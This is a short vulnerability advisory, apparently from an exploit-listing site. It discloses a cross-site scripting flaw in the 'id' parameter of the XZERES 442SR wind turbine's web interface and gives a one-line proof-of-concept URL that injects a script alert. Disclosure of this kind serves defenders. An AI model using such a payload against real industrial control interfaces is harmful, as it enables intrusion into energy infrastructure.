XZERES 442SR Wind Turbine XSS

2015.12.24

Credit: Karn Ganeshen

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability

*AFFECTED PRODUCTS*
XZERES is a US-based energy company that maintains offices in several
countries around the world, including the UK, Italy, Japan, Vietnam,
Philippines, and Myanmar.

The affected product, 442SR Wind Turbine, has a web-based interface system.
According to XZERES, the 442SR is deployed across the Energy sector. XZERES
estimates that this product is used worldwide.

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01

*Vulnerable parameter*
id

*PoC*

http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter")
</script>
-- 
Best Regards,
Karn Ganeshen

References:

https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

XZERES 442SR Wind Turbine XSS

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.